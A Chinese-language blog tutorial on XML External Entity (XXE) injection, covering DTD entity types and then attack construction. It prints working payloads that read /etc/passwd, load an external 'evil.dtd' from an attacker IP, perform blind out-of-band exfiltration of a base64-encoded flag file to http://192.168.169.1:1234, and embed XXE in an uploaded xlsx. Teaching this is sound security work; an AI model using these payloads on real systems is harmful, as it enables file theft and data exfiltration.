XML外部实体注入

于 2024-08-16 17:40:16 发布
阅读量602 收藏 11
点赞数 10
文章标签: xml 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75572825/article/details/141265547
版权

1.DTD实体及引用

DTD(文档类型定义)是一种用于定义XML文档结构和元素约束的方法。它可以描述一个XML文档的元素、属性、实体、注释等,从而规定了文档的结构和语法规则。DTD 通常是一个单独的文件,可以被多个XML文档所共享。

而在DTD中,实体是一种可以被引用的数据类型,它可以用来代替特定的字符,字符串,符号等,从而使DTD更加灵活和易于维护

(1)内部实体

格式:<!ENTITY 实体名称 "实体的值">

例子:

<!DOCTYPE note [

  <!ENTITY author "John Smith">

]>

<user><username>&author;</username><password>1</password></user>

在这个例子中,定义了一个名为author的内部实体,它的实际内容是John Smith,在xml文档中,通过&author进行引用,并将其替换为实际内容

(2)外部实体

格式:<!ENTITY 实体名称 SYSTEM "URI">

例子:

<!DOCTYPE note [

  <!ENTITY author SYSTEM "author.txt">

]>

<note>

  <to>Tove</to>

  <from>Jani</from>

  <heading>Reminder</heading>

  <body>Hello &author;!</body>

</note>

在这个例子中,定义了一个名为“author”的外部实体,它在一个名为“author.txt”的文件中定义。在XML文档中,通过使用“&author”来引用该实体,并将其替换为“author.txt”文件中的实际内容。

(3)通用实体

格式:<!ENTITY entity-name "entity-value">

其中,entity-name是实体的名称,entity-value 是实体的值。通用实体可以在XML文档中任何位置用和使用,使用实体引用的方式引用该实体。

(4)参数实体

格式:<!ENTITY % entity-name "entity-value">

其中,entity-name是参数实体的名称,entity-value 是参数实体的值。参数实体只能在DTD中引用和使用,使用%符号和实体名称的方式引用该实体

例子:

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE message [

<!ENTITY  %  remote SYSTEM "http://IP:6666">

%remote;

]>

<message></message>

注:

A.使用% 实体名(这里面空格不能少)在DTD 中定义,并且只能在DTD 中使用

% 实体名;引用。

B.只有在DTD文件中,参数实体的声明才能引用其他实体。

C.和通用实体一样,参数实体也可以外部引用。

D.特殊符号

在XML中,一些字符拥有特殊的意义,如果把这些直接放进XML元素中会产生错误。比如下面这个插入了“<”符号,解析器会把它当作新元素的开始,就会产生错误,为了避免这个错误,我们可以用实体引用来替代这些特殊的字符。比如在XML中有5个预定义的实体引用:

2.XML外部实体注入

(1)原理

利用了XML解析器中的实体功能,向目标应用程序注入恶意实体。攻击者构造一个恶意XML文档,并在其中插入一个外部实体引用,引用指向一个攻击者控制的文件或URL。当目标应用程序解析恶意XML文档时,它会尝试加载外部实体,并执行其中包含的代码或读取其中包含的数据。

(2)构建方法

A.直接通过DTD+外部实体声明

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<user><username>&xxe;</username><password>1234</password></user>

B.通过DTD文档引入外部DTD文档,再引入外部实体

<?xml version="1.0"?>

<!DOCTYPE a SYSTEM "http://192.168.169.1/evil.dtd">

<user><username>&xxe;</username><password>1234</password></user>

Evil.dtd文件内容:

<!ENTITY xxe SYSTEM "file:///etc/passwd">

C.无回显

按B中方法进行利用发现没有回显,那么就需要用blind xxe漏洞去利用

<!DOCTYPE convert [

<!ENTITY % remote SYSTEM "http://192.168.169.1:1234/test.dtd">

%remote;%int;%send;

]>

<user><username>1</username><password>2ad</password></user>

Test.dtd:

<!ENTITY %file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/flag">

<!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.169.1:1234/?p=%file;'>">

(3)EXCEL文档XXE

实际上,现代Excel文件实际上只是XML文档的zip文件。这称为0fice Open XML格式或00XML。许多应用程序允许上传文件。有些处理内部数据并采取相应的操作,这几乎肯定需要解析XML。如果解析器未安全配置,则XXE几乎是不可避免的。

<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "http://xxx.com/" >]>

<name>&GVI;</name>

首先新建xlsx文件,然后将其后缀修改为.zip,再将该zip文件解压,打开[Content_Types].xml把测试代码放到第二、三行

然后将其后缀改为xlsx再上传即可

HXYR
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
【CVE-2020-29436:Nexus3 XML外部实体注入复现】 这篇文章主要讨论了CVE-2020-29436,这是一个针对Nexus Repository Manager 3的安全漏洞,该漏洞是由于XML外部实体注入(XXE)引起的。Nexus Repository Manager 3...
CVE-2018-11788:Apache Karaf XXE漏洞(CVE-2018-11788)
03-18
在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXE(XML外部实体注入)漏洞。 导致解析器不正确地解析XML文档。受影响的版本Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6分析根据,Apache ...
XML 外部实体注入
2201_75370376的博客
06-22 963
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
XML外部实体注入(XXE)
常备不懈
05-30 371
XML外部实体注入XML eXternal Entity Injection,XXE)是一种针对解析XML输入的应用程序的攻击。当应用程序处理包含不受信任的外部实体引用的XML输入,并使用配置不当的XML解析器时,就可能发生这种攻击。此类攻击可能导致机密数据泄露、拒绝服务攻击(DoS)、服务器端请求伪造(SSRF)以及从解析器所在服务器进行端口扫描等一系列系统安全问题。
XML外部实体注入基础
qq_63928796的博客
12-06 521
xml xml的优点 xml是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,非常适合Web传输,而且xml有助于在服务器之间穿梭结构化数据,方便开发人员控制数据的存储和传输。 而且在配置文件里边所有的配置文件都是以XMl的格式来编写的,跨平台进行数据交互,它可以跨操作系统,也可以跨编程语言的平台,所以可以看出XML是非常方便的,应用的范围也很广,但如果存在漏洞,那危害就不言而喻了 dtd Document Type Definition文档类型定义 https://
提供xml外部实体注入攻击的详细解说
qq_38140936的博客
07-08 894
常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置。常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置。如果程序中不对解析实体做限制的话,可以通过少量的DTD定义,实现海量大小的解析结果的效果,会大量占用服务器的处理、存储。通过构造特定格式的xml文档,读取服务器上指定文件的内容,达到敏感信息获取的目的。
【burpsuite安全练兵场-服务端10】XML外部实体注入(XXE注入)-9个实验(全)
01-11 8128
【BP靶场portswigger-服务端10-XML外部实体注入(XXE注入)】9个实验-万文详细步骤
利用 XML 外部实体注入
blacklordking的博客
06-21 399
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签和结束标签,在开始标签和结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体
XML 外部实体注入漏洞
qq_40201047的博客
11-14 4631
0x01 XXE(XML外部实体注入)漏洞 1.1 漏洞原因 1.2 漏洞构造方式 1.3 XML可解析的协议 0x02 寻找XXE漏洞隐藏的攻击面 2.1 XInclude攻击 2.2 通过文件上传进行XXE攻击 2.3 通过修改Content-Type头进行XXE攻击 0x03 如何查找和测试XXE漏洞 0x01 XXE(XML外部实体注入)漏洞 1.1 漏洞原因 XML外部实体注入XML Extenrnal Entity Injection),简称XXE漏洞。引发...
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5360
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
XXE:XML外部实体注入攻击
qq_68163788的博客
02-20 1163
XXE(XML External Entity)注入攻击是一种利用XML解析器漏洞的攻击方式。攻击者通过在XML文档中插入恶意的外部实体引用,可以读取本地文件、执行远程请求等操作,从而获取敏感信息或者实施其他攻击。 XXE攻击通常发生在使用XML解析器解析用户输入数据的应用程序中,例如Web应用程序、SOAP服务等。攻击者可以构造包含恶意外部实体引用的XML文档,并将其提交给目标系统进行解析,从而实现攻击目的。
34-XXE(XML外部实体注入
XLbb的博客
05-19 929
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
02-06
XML外部实体(XXE,XML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
酒店行业如何利用XML进行营销短信
kuaixunhuaruan的博客
08-12 319
随着信息社会的到来,消费者获得会所的服务也从单纯的电话方式,逐渐转变为电话、互联网、传真,群发短信等多种媒体并行的方式。今天着重介绍下酒店行业如何利用短信平台进行营销。
已解决org.xml.sax.SAXNotRecognizedException异常的正确解决方法,亲测有效!!!
小明的Java问道之路
08-12 1174
已解决org.xml.sax.SAXNotRecognizedException异常的正确解决方法,亲测有效!!!
如何在 Odoo 16 中覆盖创建、写入和取消链接方法
最新发布
weixin_62077901的博客
08-14 377
重写 Odoo 16 中的创建、写入和取消链接方法是自定义 Odoo 模块行为的有效方法,无需修改核心代码。这些方法允许您拦截和定制模型中记录的创建、更新和删除,以满足特定的业务需求。在重写 create 方法时,我们可以在方法内部添加我们的逻辑。在我们的例子中,将合作伙伴的名称大写。如果满足条件,它将引发一个 UserError,并显示一条消息,表明合作伙伴也是供应商,并且我们会阻止创建销售订单。让我们检查一个覆盖“sale.order”模型的创建方法的例子,如果合作伙伴也是供应商,则显示用户错误。
pugixml编写一个xml工具类并且满足事务以及数据一致性
sinat_27674731的博客
08-12 263
使用pugixml编写一个xml工具类满足以下要求:1.可以依据xpath对xml进行增删改查。2.操作时必须保证数据的一致性。3.满足事务
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值